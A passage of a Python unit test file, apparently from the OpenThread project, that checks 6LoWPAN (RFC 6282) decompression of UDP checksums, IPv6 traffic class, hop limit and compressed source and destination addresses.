udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, c)
self.assertEqual(checksum, actual_checksum)
def test_should_parse_udp_datagram_checksum_when_decompress_udp_checksum_called_with_udphc_c_eq_1(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
c = factory.UDP_HC_C_ELIDED
udphc = lowpan.LowpanUDPHC(c, any_p())
data_bytes = bytearray()
# WHEN
actual_checksum = factory._decompress_udp_checksum(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, c)
self.assertEqual(0, actual_checksum)
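# LOWPAN_IPHC header decompression (RFC 6282): the tests below drive the
# factory's individual field decoders (_decompress_tf, _decompress_nh,
# _decompress_hlim and the address decompressors) across the TF/NH/HLIM and
# SAC/SAM, M/DAC/DAM combinations.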
class TestLowpanIpv6HeaderFactory(unittest.TestCase):
IPV6_LINKLOCAL_PREFIX = bytearray(
[0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
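    # TF field encodings: 00 -> ECN + DSCP + 20-bit flow label inline (4 bytes);
    # 01 -> ECN + flow label (3 bytes, DSCP elided); 10 -> ECN + DSCP only
    # (1 byte); 11 -> traffic class and flow label fully elided.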
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_0(
self):
# GIVEN
ecn = any_ecn()
dscp = any_dscp()
flow_label = any_flow_label()
data_bytes = bytearray()
data_bytes.append((ecn << 6) | dscp)
data_bytes.append((flow_label >> 16) & 0x0F)
data_bytes.append((flow_label >> 8) & 0xFF)
data_bytes.append(flow_label & 0xFF)
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_4B
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, tf)
self.assertEqual((dscp << 2) | ecn, actual_traffic_class)
self.assertEqual(flow_label, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_1(
self):
# GIVEN
ecn = any_ecn()
flow_label = any_flow_label()
data_bytes = bytearray()
data_bytes.append((ecn << 6) | (flow_label >> 16) & 0x0F)
data_bytes.append((flow_label >> 8) & 0xFF)
data_bytes.append(flow_label & 0xFF)
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_3B
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, tf)
self.assertEqual(ecn, actual_traffic_class)
self.assertEqual(flow_label, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_2(
self):
# GIVEN
ecn = any_ecn()
dscp = any_dscp()
data_bytes = bytearray([(ecn << 6) | dscp])
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_1B
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(2, tf)
self.assertEqual((dscp << 2) | ecn, actual_traffic_class)
self.assertEqual(0, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_3(
self):
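        # GIVEN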
data_bytes = bytearray()
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_ELIDED
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(3, tf)
self.assertEqual(0, actual_traffic_class)
self.assertEqual(0, actual_flow_label)
    def test_should_parse_next_header_when_decompress_nh_method_called_with_iphc_nh_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
next_header = any_next_header()
nh = factory.IPHC_NH_INLINE
iphc = lowpan.LowpanIPHC(any_tf(), nh, any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray([next_header])
# WHEN
actual_next_header = factory._decompress_nh(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, nh)
self.assertEqual(next_header, actual_next_header)
    def test_should_parse_next_header_when_decompress_nh_method_called_with_iphc_nh_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
nh = factory.IPHC_NH_COMPRESSED
iphc = lowpan.LowpanIPHC(any_tf(), nh, any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_next_header = factory._decompress_nh(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, nh)
self.assertEqual(None, actual_next_header)
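    # HLIM field: 00 -> hop limit carried inline; 01, 10 and 11 map to the
    # well-known values 1, 64 and 255.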
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_0(
self):
# GIVEN
hop_limit = any_hop_limit()
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_INLINE
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray([hop_limit])
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, hlim)
self.assertEqual(hop_limit, actual_hop_limit)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_1
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, hlim)
self.assertEqual(1, actual_hop_limit)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_64
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(2, hlim)
self.assertEqual(64, actual_hop_limit)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_255
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(3, hlim)
self.assertEqual(255, actual_hop_limit)
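    # Stateless source address compression (SAC=0): SAM=00 carries the full
    # 128-bit address, SAM=01 a 64-bit IID appended to fe80::/64, SAM=10 a
    # 16-bit value mapped to fe80::ff:fe00:XXXX, and SAM=11 elides the address
    # entirely, deriving the IID from the link-layer address (U/L bit inverted).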
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
src_addr = any_src_addr()
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(src_addr))
# THEN
self.assertEqual(0, sac)
self.assertEqual(0, sam)
self.assertEqual(bytes(src_addr), actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
eui64 = any_eui64()
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(eui64))
# THEN
self.assertEqual(0, sac)
self.assertEqual(1, sam)
self.assertEqual(self.IPV6_LINKLOCAL_PREFIX + eui64, actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
rloc16 = any_rloc16()
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(rloc16))
# THEN
self.assertEqual(0, sac)
self.assertEqual(2, sam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16,
actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
src_mac_addr = common.MacAddress.from_eui64(any_src_mac_addr())
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_ELIDED
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
data_bytes = bytearray([])
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, src_mac_addr,
any_sci(),
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, sac)
self.assertEqual(3, sam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([src_mac_addr.mac_address[0] ^ 0x02]) +
src_mac_addr.mac_address[1:], actual_src_addr)
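    # Helper used by the stateful tests below: combines a context prefix with
    # an IID, zero-padding in the middle or letting the IID overlap the prefix
    # when prefix length plus IID length exceeds 16 bytes.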
def _merge_prefix_and_address(self, prefix, prefix_length, address):
total_bytes = 16
prefix_length_in_bytes = int(prefix_length / 8)
if (prefix_length_in_bytes + len(address)) > total_bytes:
total_bytes -= prefix_length_in_bytes
return prefix[:prefix_length_in_bytes] + address[-total_bytes:]
else:
total_bytes -= prefix_length_in_bytes
total_bytes -= len(address)
return prefix[:prefix_length_in_bytes] + bytearray(
[0x00] * total_bytes) + address
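    # Stateful source address compression (SAC=1): the missing prefix bits come
    # from the context selected by the SCI; SAM=00 denotes the unspecified
    # address (::).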
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory(None)
src_addr = any_src_addr()
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_UNSPECIFIED
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(src_addr))
# THEN
self.assertEqual(1, sac)
self.assertEqual(0, sam)
self.assertEqual(bytearray([0x00] * 16), actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_1(
self):
# GIVEN
sci = any_sci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[sci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
eui64 = any_eui64()
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
src_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, eui64)
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
sci, io.BytesIO(eui64))
# THEN
self.assertEqual(1, sac)
self.assertEqual(1, sam)
self.assertEqual(src_addr, actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_2(
self):
# GIVEN
sci = any_sci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[sci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
rloc16 = any_rloc16()
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
iid = bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16
src_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
sci, io.BytesIO(rloc16))
# THEN
self.assertEqual(1, sac)
self.assertEqual(2, sam)
self.assertEqual(src_addr, actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_3(
self):
# GIVEN
sci = any_sci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[sci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
src_mac_addr = common.MacAddress.from_eui64(any_src_mac_addr())
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_0B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
iid = bytearray([src_mac_addr.mac_address[0] ^ 0x02
]) + src_mac_addr.mac_address[1:]
src_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
data_bytes = bytearray([])
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, src_mac_addr, sci,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, sac)
self.assertEqual(3, sam)
self.assertEqual(src_addr, actual_src_addr)
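    # Destination address decompression mirrors the source path and adds the
    # M (multicast) bit: with M=1 and DAC=0 the 48-, 32- and 8-bit multicast
    # forms expand to ff::-based addresses, M=1 with DAC=1 and DAM=00 yields a
    # unicast-prefix-based multicast address, and several reserved
    # combinations are expected to raise RuntimeError.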
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
ipv6_addr = any_dst_addr()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
dst_mac_addr = bytearray([0x00] * 8)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, dst_mac_addr,
any_dci(),
io.BytesIO(ipv6_addr))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(0, dam)
self.assertEqual(ipv6_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
eui64 = any_eui64()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(eui64))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(1, dam)
self.assertEqual(self.IPV6_LINKLOCAL_PREFIX + eui64, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
rloc16 = any_rloc16()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(rloc16))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(2, dam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16,
actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
dst_mac_addr = common.MacAddress.from_eui64(any_dst_mac_addr())
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_ELIDED
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
data_bytes = bytearray([])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, dst_mac_addr,
any_dci(),
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(3, dam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([dst_mac_addr.mac_address[0] ^ 0x02]) +
dst_mac_addr.mac_address[1:], actual_dst_addr)
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
ipv6_addr = any_dst_addr()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(ipv6_addr))
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_1(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
eui64 = any_eui64()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
dst_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, eui64)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
dci, io.BytesIO(eui64))
# THEN
self.assertEqual(0, m)
self.assertEqual(1, dac)
self.assertEqual(1, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_2(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
rloc16 = any_rloc16()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
iid = bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16
dst_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
dci, io.BytesIO(rloc16))
# THEN
self.assertEqual(0, m)
self.assertEqual(1, dac)
self.assertEqual(2, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_3(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
dst_mac_addr = common.MacAddress.from_eui64(any_dst_mac_addr())
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_0B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
iid = bytearray([dst_mac_addr.mac_address[0] ^ 0x02
]) + dst_mac_addr.mac_address[1:]
dst_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
data_bytes = bytearray([])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, dst_mac_addr, dci,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, m)
self.assertEqual(1, dac)
self.assertEqual(3, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
ipv6_addr = any_dst_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(ipv6_addr))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(0, dam)
self.assertEqual(ipv6_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr48b = any_48bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_48B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
expected_dst_addr = bytearray([
0xff, addr48b[0], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, addr48b[1], addr48b[2], addr48b[3], addr48b[4], addr48b[5]
])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(addr48b))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(1, dam)
self.assertEqual(expected_dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr32b = any_32bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_32B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
expected_dst_addr = bytearray([
0xff, addr32b[0], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, addr32b[1], addr32b[2], addr32b[3]
])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(addr32b))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(2, dam)
self.assertEqual(expected_dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr8b = any_8bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_8B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
expected_dst_addr = bytearray([
0xff, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, addr8b[0]
])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(addr8b))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(3, dam)
self.assertEqual(expected_dst_addr, actual_dst_addr)
    def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_0(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
addr48b = any_48bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
prefix = context.prefix[:8]
if len(prefix) < 8:
missing_bytes_count = 8 - len(prefix)
prefix += bytearray([0x00] * missing_bytes_count)
prefix_length = context.prefix_length
dst_addr = bytearray([0xff]) + addr48b[:2] + bytearray(
[prefix_length]) + prefix + addr48b[2:]
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
dci, io.BytesIO(addr48b))
# THEN
self.assertEqual(1, m)
self.assertEqual(1, dac)
self.assertEqual(0, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr48b = any_48bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_48B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(addr48b))
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr32b = any_32bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_32B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(addr32b))
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr8b = any_8bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_8B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(addr8b))
def test_should_merge_pfx_with_addr_bytes_when_merge_method_called_with_pfx_shorter_than_missing_bits(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
prefix = bytearray([0x20, 0x00, 0x0d, 0xb8])
prefix_length = 32
address_bytes = bytearray(
[0x1a, 0x2b, 0x3c, 0x4d, 0x5e, 0x6f, 0x70, 0x81])
addr = prefix + bytearray([0x00] * 4) + address_bytes
# WHEN
actual_addr = factory._merge_prefix_with_address(
prefix, prefix_length, address_bytes)
# THEN
self.assertEqual(addr, actual_addr)
def test_should_merge_pfx_with_addr_bytes_when_merge_method_called_with_pfx_longer_than_missing_bits_overlap(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
prefix = bytearray(
[0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x22])
prefix_length = 68
address_bytes = bytearray(
[0x1a, 0x2b, 0x3c, 0x4d, 0x5e, 0x6f, 0x70, 0x81])
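# With prefix_length = 68 the prefix covers the first 8 bytes plus the top
# nibble of byte 8 (0x2-), so the expected merged byte combines those prefix
# bits with the low nibble of the first address byte (0x1a), giving 0x2a.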
addr = prefix[:-1] + bytearray([0x2a]) + address_bytes[1:]
# WHEN
actual_addr = factory._merge_prefix_with_address(
prefix, prefix_length, address_bytes)
# THEN
self.assertEqual(addr, actual_addr)
def test_should_merge_pfx_with_address_bytes_when_merge_method_called_with_pfx_longer_than_missing_bits(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
prefix = bytearray([
0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x00,
